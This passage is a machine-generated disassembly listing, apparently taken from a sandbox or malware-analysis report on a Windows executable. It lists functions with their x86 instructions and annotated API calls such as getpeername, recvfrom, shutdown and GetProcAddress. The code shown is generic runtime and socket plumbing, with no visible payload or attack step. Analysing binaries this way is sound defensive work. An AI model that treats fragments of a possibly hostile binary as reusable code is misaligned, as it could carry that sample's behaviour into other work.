00405DC8 call 004045D4h
00405DCD add esp, 00000400h xrefs 00405D8E, 00405DC1
00405DD3 pop esi
00405DD4 pop ebx
00405DD5 ret function end
Function 0041BC40, API count: 0, instr count: 61
Address Instruction Meta Information
0041BC40 push ebp
0041BC41 mov ebp, esp
0041BC43 add esp, FFFFFFF8h
0041BC46 push ebx
0041BC47 push esi
0041BC48 push edi
0041BC49 mov dword ptr [ebp-08h], ecx
0041BC4C mov dword ptr [ebp-04h], edx
0041BC4F mov ebx, eax
0041BC51 mov eax, dword ptr [ebp-04h]
0041BC54 call 00404868h
0041BC59 mov eax, dword ptr [ebp-08h]
0041BC5C call 00404868h
0041BC61 xor eax, eax
0041BC63 push ebp
0041BC64 push 0041BCF9h
0041BC69 push dword ptr fs:[eax]
0041BC6C mov dword ptr fs:[eax], esp
0041BC6F xor eax, eax
0041BC71 push ebp
0041BC72 push 0041BCD4h
0041BC77 push dword ptr fs:[eax]
0041BC7A mov dword ptr fs:[eax], esp
0041BC7D cmp dword ptr [ebx+000001C0h], 00000000h
0041BC84 je 0041BC95h
0041BC86 mov ecx, dword ptr [ebp-08h]
0041BC89 mov edx, dword ptr [ebp-04h]
0041BC8C mov eax, ebx
0041BC8E call 0041BD08h
0041BC93 jmp 0041BCBAh
0041BC95 cmp dword ptr [ebx+00000204h], 00000000h xrefs 0041BC84
0041BC9C je 0041BCADh
0041BC9E mov ecx, dword ptr [ebp-08h]
0041BCA1 mov edx, dword ptr [ebp-04h]
0041BCA4 mov eax, ebx
0041BCA6 call 0041BE30h
0041BCAB jmp 0041BCBAh
0041BCAD mov ecx, dword ptr [ebp-08h] xrefs 0041BC9C
0041BCB0 mov edx, dword ptr [ebp-04h]
0041BCB3 mov eax, ebx
0041BCB5 call 004184B8h
0041BCBA cmp dword ptr [ebx+000001B8h], 00000000h xrefs 0041BCAB, 0041BC93
0041BCC1 jne 0041BCCAh
0041BCC3 mov eax, ebx
0041BCC5 call 0041BA7Ch
0041BCCA xor eax, eax xrefs 0041BCC1
0041BCCC pop edx
0041BCCE pop ecx Count = 2
0041BCCF mov dword ptr fs:[eax], edx
0041BCD2 jmp 0041BCDEh
0041BCDE xor eax, eax xrefs 0041BCD2
0041BCE0 pop edx
0041BCE2 pop ecx Count = 2
0041BCE3 mov dword ptr fs:[eax], edx
0041BCE6 push 0041BD00h
0041BCEB lea eax, dword ptr [ebp-08h] xrefs 0041BCFE
0041BCEE mov edx, 00000002h
0041BCF3 call 00404400h
0041BCF8 ret function end
Function 0040A394, API count: 1, instr count: 50
APIs
    • GetLocaleInfoA.KERNEL32, ref: 0040A12A
  • EnumCalendarInfoA.KERNEL32, ref: 0040A3E7
Address Instruction Meta Information
0040A394 push ebp xrefs 0040B7F1
0040A395 mov ebp, esp
0040A397 push 00000000h
0040A399 push esi
0040A39A xor eax, eax
0040A39C push ebp
0040A39D push 0040A42Bh
0040A3A2 push dword ptr fs:[eax]
0040A3A5 mov dword ptr fs:[eax], esp
0040A3A8 lea eax, dword ptr [ebp-04h]
0040A3AB push eax
0040A3AC call 004061ECh
0040A3B1 mov ecx, 0040A440h
0040A3B6 mov edx, 0000100Bh
0040A3BB call 0040A10Ch
0040A3C0 mov eax, dword ptr [ebp-04h]
0040A3C3 mov edx, 00000001h
0040A3C8 call 00407608h
0040A3CD mov esi, eax
0040A3CF mov eax, esi
0040A3D1 add eax, FFFFFFFDh
0040A3D4 sub eax, 03h
0040A3D7 jnc 0040A415h
0040A3D9 push 00000004h
0040A3DB push esi
0040A3DC call 004061ECh
0040A3E1 push eax
0040A3E2 push 0040A2E0h
0040A3E7 call 00406124h EnumCalendarInfoA@KERNEL32.DLL (Hidden Import)
0040A3EC mov edx, 00000007h
0040A3F1 mov eax, 0042C764h
0040A3F6 mov dword ptr [eax], FFFFFFFFh xrefs 0040A400
0040A3FC add eax, 04h
0040A3FF dec edx
0040A400 jne 0040A3F6h
0040A402 push 00000003h
0040A404 push esi
0040A405 call 004061ECh
0040A40A push eax
0040A40B push 0040A31Ch
0040A410 call 00406124h
0040A415 xor eax, eax xrefs 0040A3D7
0040A417 pop edx
0040A419 pop ecx Count = 2
0040A41A mov dword ptr fs:[eax], edx
0040A41D push 0040A432h
0040A422 lea eax, dword ptr [ebp-04h] xrefs 0040A430
0040A425 call 004043DCh
0040A42A ret function end
Function 004184B8, API count: 0, instr count: 70
Address Instruction Meta Information
004184B8 push ebp xrefs 0041BB5A, 0041BCB5, 0041BE99, 0041BD48
004184B9 mov ebp, esp
004184BB add esp, FFFFFFD8h
004184BE push ebx
004184BF xor ebx, ebx
004184C1 mov dword ptr [ebp-28h], ebx
004184C4 mov dword ptr [ebp-08h], ecx
004184C7 mov dword ptr [ebp-04h], edx
004184CA mov ebx, eax
004184CC mov eax, dword ptr [ebp-04h]
004184CF call 00404868h
004184D4 mov eax, dword ptr [ebp-08h]
004184D7 call 00404868h
004184DC xor eax, eax
004184DE push ebp
004184DF push 004185A2h
004184E4 push dword ptr fs:[eax]
004184E7 mov dword ptr fs:[eax], esp
004184EA mov eax, dword ptr [ebp-08h]
004184ED push eax
004184EE lea edx, dword ptr [ebp-24h]
004184F1 mov ecx, dword ptr [ebp-04h]
004184F4 mov eax, ebx
004184F6 call 0041803Ch
004184FB cmp dword ptr [ebx+000001B8h], 00000000h
00418502 jne 00418554h
00418504 cmp dword ptr [ebx+000001B4h], FFFFFFFFh
0041850B jne 00418517h
0041850D lea edx, dword ptr [ebp-24h]
00418510 mov eax, ebx
00418512 call 004181D8h
00418517 lea edx, dword ptr [ebp-24h] xrefs 0041850B
0041851A mov eax, dword ptr [ebx+000001B4h]
00418520 call 004139F4h
00418525 mov edx, eax
00418527 mov eax, ebx
00418529 mov ecx, dword ptr [eax]
0041852B call dword ptr [ecx+78h]
0041852E cmp dword ptr [ebx+000001B8h], 00000000h
00418535 jne 0041853Eh
00418537 mov eax, ebx
00418539 call 004185DCh
0041853E lea eax, dword ptr [ebx+6Ch] xrefs 00418535
00418541 call 004043DCh
00418546 mov byte ptr [ebx+00000089h], 00000000h
0041854D mov byte ptr [ebx+0000008Ah], 00000000h
00418554 mov eax, ebx xrefs 00418502
00418556 call 0041952Ch
0041855B push dword ptr [ebp-04h]
0041855E push 004185B8h
00418563 push dword ptr [ebp-08h]
00418566 lea eax, dword ptr [ebp-28h]
00418569 mov edx, 00000003h
0041856E call 00404738h
00418573 mov ecx, dword ptr [ebp-28h]
00418576 mov dl, 05h
00418578 mov eax, ebx
0041857A call 00419E70h
0041857F xor eax, eax
00418581 pop edx
00418583 pop ecx Count = 2
00418584 mov dword ptr fs:[eax], edx
00418587 push 004185A9h
0041858C lea eax, dword ptr [ebp-28h] xrefs 004185A7
0041858F call 004043DCh
00418594 lea eax, dword ptr [ebp-08h]
00418597 mov edx, 00000002h
0041859C call 00404400h
004185A1 ret function end
Function 00413A38, API count: 1, instr count: 18
APIs
  • getpeername.WS2_32, ref: 00413A55
Address Instruction Meta Information
00413A38 push ebx xrefs 004185D5
00413A39 push esi
00413A3A push ecx
00413A3B mov ebx, edx
00413A3D mov esi, eax
00413A3F mov dword ptr [esp], 0000001Ch
00413A46 mov eax, ebx
00413A48 xor ecx, ecx
00413A4A mov edx, dword ptr [esp]
00413A4D call 00403030h
00413A52 push esp
00413A53 push ebx
00413A54 push esi
00413A55 call dword ptr [0042B430h] getpeername@WS2_32.DLL (Hidden Import)
00413A5B pop edx
00413A5C pop esi
00413A5D pop ebx
00413A5E ret function end
Function 00418D2C, API count: 0, instr count: 104
Address Instruction Meta Information
00418D2C push ebx
00418D2D push esi
00418D2E push edi
00418D2F push ebp
00418D30 mov esi, ecx
00418D32 mov ebp, edx
00418D34 mov ebx, eax
00418D36 mov eax, esi
00418D38 call 004043DCh
00418D3D mov eax, ebx
00418D3F call 0041949Ch
00418D44 cmp dword ptr [ebx+6Ch], 00000000h
00418D48 je 00418D61h
00418D4A mov eax, esi
00418D4C mov edx, dword ptr [ebx+6Ch]
00418D4F call 00404430h
00418D54 lea eax, dword ptr [ebx+6Ch]
00418D57 call 004043DCh
00418D5C jmp 00418DF4h
00418D61 xor eax, eax xrefs 00418D48
00418D63 call 00413778h
00418D68 mov eax, ebx
00418D6A mov edx, dword ptr [eax]
00418D6C call dword ptr [edx+74h]
00418D6F mov edi, eax
00418D71 test edi, edi
00418D73 jle 00418D9Ah
00418D75 mov eax, esi
00418D77 mov edx, edi
00418D79 call 004049A8h
00418D7E mov edx, dword ptr [esi]
00418D80 mov ecx, edi
00418D82 mov eax, ebx
00418D84 mov edi, dword ptr [eax]
00418D86 call dword ptr [edi+3Ch]
00418D89 mov edi, eax
00418D8B test edi, edi
00418D8D jl 00418DF4h
00418D8F mov eax, esi
00418D91 mov edx, edi
00418D93 call 004049A8h
00418D98 jmp 00418DF4h
00418D9A mov edx, ebp xrefs 00418D73
00418D9C mov eax, ebx
00418D9E mov ecx, dword ptr [eax]
00418DA0 call dword ptr [ecx+0000008Ch]
00418DA6 test al, al
00418DA8 je 00418DEAh
00418DAA mov eax, ebx
00418DAC mov edx, dword ptr [eax]
00418DAE call dword ptr [edx+74h]
00418DB1 mov edi, eax
00418DB3 test edi, edi
00418DB5 jne 00418DC1h
00418DB7 mov dword ptr [ebx+000001B8h], 00002746h
00418DC1 test edi, edi xrefs 00418DB5
00418DC3 jle 00418DF4h
00418DC5 mov eax, esi
00418DC7 mov edx, edi
00418DC9 call 004049A8h
00418DCE mov edx, dword ptr [esi]
00418DD0 mov ecx, edi
00418DD2 mov eax, ebx
00418DD4 mov edi, dword ptr [eax]
00418DD6 call dword ptr [edi+3Ch]
00418DD9 mov edi, eax
00418DDB test edi, edi
00418DDD jl 00418DF4h
00418DDF mov eax, esi
00418DE1 mov edx, edi
00418DE3 call 004049A8h
00418DE8 jmp 00418DF4h
00418DEA mov dword ptr [ebx+000001B8h], 0000274Ch xrefs 00418DA8
00418DF4 cmp byte ptr [ebx+00000088h], 00000000h xrefs 00418DC3, 00418DDD, 00418DE8, 00418D8D, 00418D98, 00418D5C
00418DFB je 00418E52h
00418DFD cmp dword ptr [esi], 00000000h
00418E00 je 00418E52h
00418E02 cmp byte ptr [ebx+00000089h], 00000000h
00418E09 je 00418E23h
00418E0B mov eax, dword ptr [esi]
00418E0D cmp byte ptr [eax], 0000000Ah
00418E10 jne 00418E23h
00418E12 mov eax, esi
00418E14 mov ecx, 00000001h
00418E19 mov edx, 00000001h
00418E1E call 00404918h
00418E23 cmp byte ptr [ebx+0000008Ah], 00000000h xrefs 00418E09, 00418E10
00418E2A je 00418E44h
00418E2C mov eax, dword ptr [esi]
00418E2E cmp byte ptr [eax], 0000000Dh
00418E31 jne 00418E44h
00418E33 mov eax, esi
00418E35 mov ecx, 00000001h
00418E3A mov edx, 00000001h
00418E3F call 00404918h
00418E44 mov byte ptr [ebx+00000089h], 00000000h xrefs 00418E2A, 00418E31
00418E4B mov byte ptr [ebx+0000008Ah], 00000000h
00418E52 mov eax, ebx xrefs 00418DFB, 00418E00
00418E54 call 0041952Ch
00418E59 pop ebp
00418E5A pop edi
00418E5B pop esi
00418E5C pop ebx
00418E5D ret function end
Function 00406038, API count: 1, instr count: 19
APIs
  • GetModuleHandleA.KERNEL32, ref: 00406044
Address Instruction Meta Information
00406038 push ebx xrefs 00429D9E
00406039 mov ebx, eax
0040603B xor eax, eax
0040603D mov dword ptr [0042B0C4h], eax
00406042 push 00000000h
00406044 call 00405F74h GetModuleHandleA@KERNEL32.DLL (Hidden Import)
00406049 mov dword ptr [0042C660h], eax
0040604E mov eax, dword ptr [0042C660h] 00400000
00406053 mov dword ptr [0042B0CCh], eax
00406058 xor eax, eax
0040605A mov dword ptr [0042B0D0h], eax
0040605F xor eax, eax
00406061 mov dword ptr [0042B0D4h], eax
00406066 call 0040602Ch
0040606B mov edx, 0042B0C8h
00406070 mov eax, ebx
00406072 call 004040C4h
00406077 pop ebx
00406078 ret function end
Function 0041BA38, API count: 1, instr count: 23
APIs
  • shutdown.WS2_32, ref: 0041BA6A
Address Instruction Meta Information
0041BA38 push ebx
0041BA39 mov ebx, eax
0041BA3B mov eax, dword ptr [ebx+00000200h]
0041BA41 cmp byte ptr [eax+08h], 00000000h
0041BA45 je 0041BA4Ch
0041BA47 mov edx, dword ptr [eax]
0041BA49 call dword ptr [edx+1Ch]
0041BA4C mov eax, dword ptr [ebx+000001B4h] xrefs 0041BA45
0041BA52 cmp eax, FFFFFFFFh
0041BA55 je 0041BA73h
0041BA57 cmp dword ptr [ebx+000001B8h], 00000000h
0041BA5E jne 0041BA73h
0041BA60 push 00000001h
0041BA62 push eax
0041BA63 mov eax, dword ptr [0042B784h] 0042B3F0
0041BA68 mov eax, dword ptr [eax]
0041BA6A call eax shutdown@WS2_32.DLL (Hidden Import)
0041BA6C mov eax, ebx
0041BA6E call 004196C4h
0041BA73 mov eax, ebx xrefs 0041BA55, 0041BA5E
0041BA75 call 004182F4h
0041BA7A pop ebx
0041BA7B ret function end
Function 00405364, API count: 6, instr count: 136
APIs
    • CharNextA.USER32, ref: 00405353
  • GetModuleHandleA.KERNEL32, ref: 00405381
  • GetProcAddress.KERNEL32, ref: 00405392
  • lstrcpyn.KERNEL32, ref: 00405426
  • FindFirstFileA.KERNEL32, ref: 0040546E
  • FindClose.KERNEL32, ref: 0040547B
  • lstrlen.KERNEL32, ref: 00405487
Strings
  • kernel32.dll, va: 004054F8
  • GetLongPathNameA, va: 00405508
Address Instruction Meta Information
00405364 push ebp xrefs 004055BF
00405365 mov ebp, esp
00405367 add esp, FFFFFDB0h
0040536D push ebx
0040536E push esi
0040536F push edi
00405370 mov dword ptr [ebp-08h], edx
00405373 mov dword ptr [ebp-04h], eax
00405376 mov eax, dword ptr [ebp-04h]
00405379 mov dword ptr [ebp-0Ch], eax
0040537C push 004054F8h ASCII "kernel32.dll"
00405381 call 00401260h GetModuleHandleA@KERNEL32.DLL (Hidden Import)
00405386 mov esi, eax
00405388 test esi, esi
0040538A je 004053CCh
0040538C push 00405508h ASCII "GetLongPathNameA"
00405391 push esi
00405392 call 00401268h GetProcAddress@KERNEL32.DLL (Import)
00405397 mov ebx, eax
00405399 test ebx, ebx
0040539B je 004053CCh
0040539D push 00000105h
004053A2 lea eax, dword ptr [ebp-0000024Fh]
004053A8 push eax
004053A9 mov eax, dword ptr [ebp-04h]
004053AC push eax
004053AD call ebx
004053AF test eax, eax
004053B1 je 004053CCh
004053B3 mov eax, dword ptr [ebp-08h]
004053B6 push eax
004053B7 lea eax, dword ptr [ebp-0000024Fh]
004053BD push eax
004053BE mov eax, dword ptr [ebp-04h]
004053C1 push eax
004053C2 call 00401290h
004053C7 jmp 004054EEh
004053CC mov eax, dword ptr [ebp-04h] xrefs 0040538A, 0040539B, 004053B1
004053CF cmp byte ptr [eax], 0000005Ch
004053D2 jne 0040540Ch
004053D4 mov eax, dword ptr [ebp-04h]
004053D7 cmp byte ptr [eax+01h], 0000005Ch
004053DB jne 004054EEh
004053E1 mov eax, dword ptr [ebp-04h]
004053E4 add eax, 02h
004053E7 call 00405350h
004053EC mov esi, eax
004053EE cmp byte ptr [esi], 00000000h
004053F1 je 004054EEh
004053F7 lea eax, dword ptr [esi+01h]
004053FA call 00405350h
004053FF mov esi, eax
00405401 cmp byte ptr [esi], 00000000h
00405404 je 004054EEh
0040540A jmp 00405412h
0040540C mov esi, dword ptr [ebp-04h] xrefs 004053D2
0040540F add esi, 02h
00405412 mov ebx, esi xrefs 0040540A
00405414 sub ebx, dword ptr [ebp-04h]
00405417 lea eax, dword ptr [ebx+01h]
0040541A push eax
0040541B mov eax, dword ptr [ebp-04h]
0040541E push eax
0040541F lea eax, dword ptr [ebp-0000024Fh]
00405425 push eax
00405426 call 00401290h lstrcpyn@KERNEL32.DLL (Hidden Import)
0040542B jmp 004054D1h
00405430 lea eax, dword ptr [esi+01h] xrefs 004054D4
00405433 call 00405350h
00405438 mov edi, eax
0040543A mov eax, edi
0040543C sub eax, esi
0040543E mov edx, eax
00405440 add edx, ebx
00405442 inc edx
00405443 cmp edx, 00000105h
00405449 jg 004054EEh
0040544F inc eax
00405450 push eax
00405451 push esi
00405452 lea eax, dword ptr [ebp-0000024Fh]
00405458 add eax, ebx
0040545A push eax
0040545B call 00401290h
00405460 lea eax, dword ptr [ebp-0000014Ah]
00405466 push eax
00405467 lea eax, dword ptr [ebp-0000024Fh]
0040546D push eax
0040546E call 00401230h FindFirstFileA@KERNEL32.DLL (Hidden Import)
00405473 mov esi, eax
00405475 cmp esi, FFFFFFFFh
00405478 je 004054EEh
0040547A push esi
0040547B call 00401228h FindClose@KERNEL32.DLL (Hidden Import)
00405480 lea eax, dword ptr [ebp-0000011Eh]
00405486 push eax
00405487 call 00401298h lstrlen@KERNEL32.DLL (Hidden Import)
0040548C lea edx, dword ptr [ebx+01h]
0040548F add eax, edx
00405491 inc eax
00405492 cmp eax, 00000105h
00405497 jnle 004054EEh
00405499 mov byte ptr [ebp+ebx-0000024Fh], 0000005Ch
004054A1 mov eax, 00000105h
004054A6 sub eax, ebx
004054A8 dec eax
004054A9 push eax
004054AA lea eax, dword ptr [ebp-0000011Eh]
004054B0 push eax
004054B1 lea eax, dword ptr [ebp-0000024Fh]
004054B7 add eax, ebx
004054B9 inc eax
004054BA push eax
004054BB call 00401290h
004054C0 lea eax, dword ptr [ebp-0000011Eh]
004054C6 push eax
004054C7 call 00401298h
004054CC inc eax
004054CD add ebx, eax
004054CF mov esi, edi
004054D1 cmp byte ptr [esi], 00000000h xrefs 0040542B
004054D4 jne 00405430h
004054DA mov eax, dword ptr [ebp-08h]
004054DD push eax
004054DE lea eax, dword ptr [ebp-0000024Fh]
004054E4 push eax
004054E5 mov eax, dword ptr [ebp-04h]
004054E8 push eax
004054E9 call 00401290h
004054EE mov eax, dword ptr [ebp-0Ch] xrefs 00405449, 00405478, 00405497, 004053DB, 004053F1, 00405404, 004053C7
004054F1 pop edi
004054F2 pop esi
004054F3 pop ebx
004054F4 mov esp, ebp
004054F6 pop ebp
004054F7 ret function end
Function 004059A4, API count: 1, instr count: 20
APIs
  • InterlockedDecrement.KERNEL32, ref: 004059B0
Address Instruction Meta Information
004059A4 push ebp
004059A5 mov ebp, esp
004059A7 push ebx
004059A8 push esi
004059A9 mov ebx, dword ptr [ebp+08h]
004059AC lea eax, dword ptr [ebx+04h]
004059AF push eax
004059B0 call 004012F0h InterlockedDecrement@KERNEL32.DLL (Hidden Import)
004059B5 mov esi, eax
004059B7 test esi, esi
004059B9 jne 004059C4h
004059BB mov dl, 01h
004059BD mov eax, ebx
004059BF mov ecx, dword ptr [eax]
004059C1 call dword ptr [ecx-04h]
004059C4 mov eax, esi xrefs 004059B9
004059C6 pop esi
004059C7 pop ebx
004059C8 pop ebp
004059C9 retn 0004h function end
Function 0040BB40, API count: 1, instr count: 49
APIs
    • FormatMessageA.KERNEL32, ref: 0040A0DF
  • RtlGetLastWin32Error.NTDLL, ref: 0040BB5A
Address Instruction Meta Information
0040BB40 push ebp xrefs 0040BBE3, 00412ECC
0040BB41 mov ebp, esp
0040BB43 add esp, FFFFFFECh
0040BB46 push ebx
0040BB47 xor eax, eax
0040BB49 mov dword ptr [ebp-14h], eax
0040BB4C xor eax, eax
0040BB4E push ebp
0040BB4F push 0040BBD0h
0040BB54 push dword ptr fs:[eax]
0040BB57 mov dword ptr fs:[eax], esp
0040BB5A call 004061ACh RtlGetLastWin32Error@NTDLL.DLL (Hidden Import)
0040BB5F mov ebx, eax
0040BB61 test ebx, ebx
0040BB63 je 0040BB9Ch
0040BB65 mov dword ptr [ebp-10h], ebx
0040BB68 mov byte ptr [ebp-0Ch], 00000000h
0040BB6C lea edx, dword ptr [ebp-14h]
0040BB6F mov eax, ebx
0040BB71 call 0040A0C0h
0040BB76 mov eax, dword ptr [ebp-14h]
0040BB79 mov dword ptr [ebp-08h], eax
0040BB7C mov byte ptr [ebp-04h], 0000000Bh
0040BB80 lea eax, dword ptr [ebp-10h]
0040BB83 push eax
0040BB84 push 00000001h
0040BB86 mov ecx, dword ptr [0042B8D0h] 004064EC
0040BB8C mov dl, 01h
0040BB8E mov eax, dword ptr [00406FC8h] 00407014
0040BB93 call 0040A9C0h
0040BB98 mov edx, eax
0040BB9A jmp 0040BBB0h
0040BB9C mov ecx, dword ptr [0042B94Ch] 004064F4 xrefs 0040BB63
0040BBA2 mov dl, 01h
0040BBA4 mov eax, dword ptr [00406FC8h] 00407014
0040BBA9 call 0040A984h
0040BBAE mov edx, eax
0040BBB0 mov dword ptr [edx+0Ch], ebx xrefs 0040BB9A
0040BBB3 mov eax, edx
0040BBB5 call 00403DB8h
0040BBBA xor eax, eax
0040BBBC pop edx
0040BBBE pop ecx Count = 2
0040BBBF mov dword ptr fs:[eax], edx
0040BBC2 push 0040BBD7h
0040BBC7 lea eax, dword ptr [ebp-14h] xrefs 0040BBD5
0040BBCA call 004043DCh
0040BBCF ret function end
Function 0040A0C0, API count: 1, instr count: 28
APIs
  • FormatMessageA.KERNEL32, ref: 0040A0DF
Address Instruction Meta Information
0040A0C0 push ebx xrefs 0040BB71, 0040D787, 00412366, 00412301, 004131EC, 004132ED
0040A0C1 add esp, FFFFFF00h
0040A0C7 mov ebx, edx
0040A0C9 push 00000000h
0040A0CB push 00000100h
0040A0D0 lea edx, dword ptr [esp+08h]
0040A0D4 push edx
0040A0D5 push 00000000h
0040A0D7 push eax
0040A0D8 push 00000000h
0040A0DA push 00003200h
0040A0DF call 0040614Ch FormatMessageA@KERNEL32.DLL (Hidden Import)
0040A0E4 jmp 0040A0E7h
0040A0E6 dec eax xrefs 0040A0F2, 0040A0F7
0040A0E7 test eax, eax xrefs 0040A0E4
0040A0E9 jle 0040A0F9h
0040A0EB mov dl, byte ptr [esp+eax-01h]
0040A0EF sub dl, 00000021h
0040A0F2 jc 0040A0E6h
0040A0F4 sub dl, 0000000Dh
0040A0F7 je 0040A0E6h
0040A0F9 mov edx, esp xrefs 0040A0E9
0040A0FB mov ecx, ebx
0040A0FD xchg eax, ecx
0040A0FE call 004044CCh
0040A103 add esp, 00000100h
0040A109 pop ebx
0040A10A ret function end
Function 00412F3C, API count: 1, instr count: 109
APIs
    • ResetEvent.KERNEL32, ref: 00412EF6
    • WaitForSingleObject.KERNEL32, ref: 00412F06
  • InterlockedExchange.KERNEL32, ref: 00412FB7
Address Instruction Meta Information
00412F3C push ebp xrefs 00413586
00412F3D mov ebp, esp
00412F3F add esp, FFFFFFECh
00412F42 push ebx
00412F43 push esi
00412F44 push edi
00412F45 mov ebx, eax
00412F47 call 00406184h
00412F4C mov edx, dword ptr [0042B984h] 0042C030
00412F52 cmp eax, dword ptr [edx]
00412F54 je 00412F7Fh
00412F56 call 00406184h
00412F5B mov dword ptr [ebp-14h], eax
00412F5E mov byte ptr [ebp-10h], 00000000h
00412F62 lea eax, dword ptr [ebp-14h]
00412F65 push eax
00412F66 push 00000000h
00412F68 mov ecx, dword ptr [0042B8B8h] 0040F5AC
00412F6E mov dl, 01h
00412F70 mov eax, dword ptr [004100F0h] 0041013C
00412F75 call 0040A9C0h
00412F7A call 00403DB8h
00412F7F test ebx, ebx xrefs 00412F54
00412F81 jle 00412F8Ch
00412F83 mov eax, ebx
00412F85 call 00412EFCh
00412F8A jmp 00412F91h
00412F8C call 00412EF0h xrefs 00412F81
00412F91 xor eax, eax xrefs 00412F8A
00412F93 mov dword ptr [ebp-0Ch], eax
00412F96 push 0042C860h
00412F9B call 0040611Ch
00412FA0 xor eax, eax
00412FA2 push ebp
00412FA3 push 004130CAh
00412FA8 push dword ptr fs:[eax]
00412FAB mov dword ptr fs:[eax], esp
00412FAE mov eax, dword ptr [ebp-0Ch]
00412FB1 push eax
00412FB2 push 0042B3C4h
00412FB7 call 00406164h InterlockedExchange@KERNEL32.DLL (Hidden Import)
00412FBC mov dword ptr [ebp-0Ch], eax
00412FBF xor eax, eax
00412FC1 push ebp
00412FC2 push 004130ABh
00412FC7 push dword ptr fs:[eax]
00412FCA mov dword ptr fs:[eax], esp
00412FCD cmp dword ptr [ebp-0Ch], 00000000h
00412FD1 je 00412FDCh
00412FD3 mov eax, dword ptr [ebp-0Ch]
00412FD6 cmp dword ptr [eax+08h], 00000000h
00412FDA jnle 00412FE0h
00412FDC xor eax, eax xrefs 00412FD1
00412FDE jmp 00412FE2h
00412FE0 mov al, 01h xrefs 00412FDA
00412FE2 mov byte ptr [ebp-01h], al xrefs 00412FDE
00412FE5 cmp byte ptr [ebp-01h], 00000000h
00412FE9 je 00413095h
00412FEF jmp 00413088h
00412FF4 xor edx, edx xrefs 0041308F
00412FF6 mov eax, dword ptr [ebp-0Ch]
00412FF9 call 004106B0h
00412FFE mov dword ptr [ebp-08h], eax
00413001 xor edx, edx
00413003 mov eax, dword ptr [ebp-0Ch]
00413006 call 004105C0h
0041300B push 0042C860h
00413010 call 0040623Ch
00413015 xor eax, eax
00413017 push ebp
00413018 push 00413075h
0041301D push dword ptr fs:[eax]
00413020 mov dword ptr fs:[eax], esp
00413023 xor eax, eax
00413025 push ebp
00413026 push 00413046h
0041302B push dword ptr fs:[eax]
0041302E mov dword ptr fs:[eax], esp
00413031 mov eax, dword ptr [ebp-08h]
00413034 mov ebx, dword ptr [eax]
00413036 mov eax, dword ptr [ebx+0Ch]
00413039 call dword ptr [ebx+08h]
0041303C xor eax, eax
0041303E pop edx
00413040 pop ecx Count = 2
00413041 mov dword ptr fs:[eax], edx
00413044 jmp 0041305Dh
0041305D xor eax, eax xrefs 00413044
0041305F pop edx
00413061 pop ecx Count = 2
00413062 mov dword ptr fs:[eax], edx
00413065 push 0041307Ch
0041306A push 0042C860h xrefs 0041307A
0041306F call 0040611Ch
00413074 ret function end
00413088 mov eax, dword ptr [ebp-0Ch] xrefs 00412FEF
0041308B cmp dword ptr [eax+08h], 00000000h
0041308F jg 00412FF4h
00413095 xor eax, eax xrefs 00412FE9
00413097 pop edx
00413099 pop ecx Count = 2
0041309A mov dword ptr fs:[eax], edx
0041309D push 004130B2h
004130A2 mov eax, dword ptr [ebp-0Ch] xrefs 004130B0
004130A5 call 00403708h
004130AA ret function end
Function 00414FE8, API count: 3, instr count: 18
APIs
  • QueryPerformanceFrequency.KERNEL32, ref: 00414FF0
  • QueryPerformanceCounter.KERNEL32, ref: 00414FFA
  • GetTickCount.KERNEL32, ref: 00415018
Address Instruction Meta Information
00414FE8 add esp, FFFFFFF0h xrefs 00418634, 004186B6, 00418C06, 00418C68, 0041900B, 004190DD
00414FEB lea eax, dword ptr [esp+08h]
00414FEF push eax
00414FF0 call 00406254h QueryPerformanceFrequency@KERNEL32.DLL (Hidden Import)
00414FF5 test eax, eax
00414FF7 je 00415018h
00414FF9 push esp
00414FFA call 0040624Ch QueryPerformanceCounter@KERNEL32.DLL (Hidden Import)
00414FFF fild qword ptr [esp]
00415002 fild qword ptr [esp+08h]
00415006 fdivp st(1), st(0)
00415008 fmul dword ptr [00415024h]
0041500E call 00402A44h
00415013 and eax, FFFFFFFFh
00415016 jmp 0041501Dh
00415018 call 004061F4h GetTickCount@KERNEL32.DLL (Hidden Import) xrefs 00414FF7
0041501D add esp, 10h xrefs 00415016
00415020 ret function end
Function 00413B4C, API count: 1, instr count: 19
APIs
  • recvfrom.WS2_32, ref: 00413B67
Address Instruction Meta Information
00413B4C push ebp xrefs 00419D54
00413B4D mov ebp, esp
00413B4F push ecx
00413B50 push ebx
00413B51 mov dword ptr [ebp-04h], 0000001Ch
00413B58 lea ebx, dword ptr [ebp-04h]
00413B5B push ebx
00413B5C mov ebx, dword ptr [ebp+08h]
00413B5F push ebx
00413B60 mov ebx, dword ptr [ebp+0Ch]
00413B63 push ebx
00413B64 push ecx
00413B65 push edx
00413B66 push eax
00413B67 call dword ptr [0042B408h] recvfrom@WS2_32.DLL (Hidden Import)
00413B6D pop ebx
00413B6E pop ecx
00413B6F pop ebp
00413B70 retn 0008h function end
Function 00401A08, API count: 4, instr count: 48
APIs
  • InitializeCriticalSection.KERNEL32, ref: 00401A1E
  • RtlEnterCriticalSection.NTDLL, ref: 00401A31
  • LocalAlloc.KERNEL32, ref: 00401A5B
  • RtlLeaveCriticalSection.NTDLL, ref: 00401AB8
Address Instruction Meta Information
00401A08 push ebp xrefs 0040229D, 00402108, 00402618
00401A09 mov ebp, esp
00401A0B xor edx, edx
00401A0D push ebp
00401A0E push 00401ABEh
00401A13 push dword ptr fs:[edx]
00401A16 mov dword ptr fs:[edx], esp
00401A19 push 0042C5C4h
00401A1E call 0040135Ch InitializeCriticalSection@KERNEL32.DLL (Hidden Import)
00401A23 cmp byte ptr [0042C045h], 00000000h
00401A2A je 00401A36h
00401A2C push 0042C5C4h
00401A31 call 00401364h RtlEnterCriticalSection@NTDLL.DLL (Hidden Import)
00401A36 mov eax, 0042C5E4h xrefs 00401A2A
00401A3B call 004013CCh
00401A40 mov eax, 0042C5F4h
00401A45 call 004013CCh
00401A4A mov eax, 0042C620h
00401A4F call 004013CCh
00401A54 push 00000FF8h
00401A59 push 00000000h
00401A5B call 0040133Ch LocalAlloc@KERNEL32.DLL (Hidden Import)
00401A60 mov dword ptr [0042C61Ch], eax
00401A65 cmp dword ptr [0042C61Ch], 00000000h
00401A6C je 00401A9Dh
00401A6E mov eax, 00000003h
00401A73 mov edx, dword ptr [0042C61Ch] 00147BC8 xrefs 00401A85
00401A79 xor ecx, ecx
00401A7B mov dword ptr [edx+eax*4-0Ch], ecx
00401A7F inc eax
00401A80 cmp eax, 00000401h
00401A85 jne 00401A73h
00401A87 mov eax, 0042C604h
00401A8C mov dword ptr [eax+04h], eax
00401A8F mov dword ptr [eax], eax
00401A91 mov dword ptr [0042C610h], eax
00401A96 mov byte ptr [0042C5BCh], 00000001h
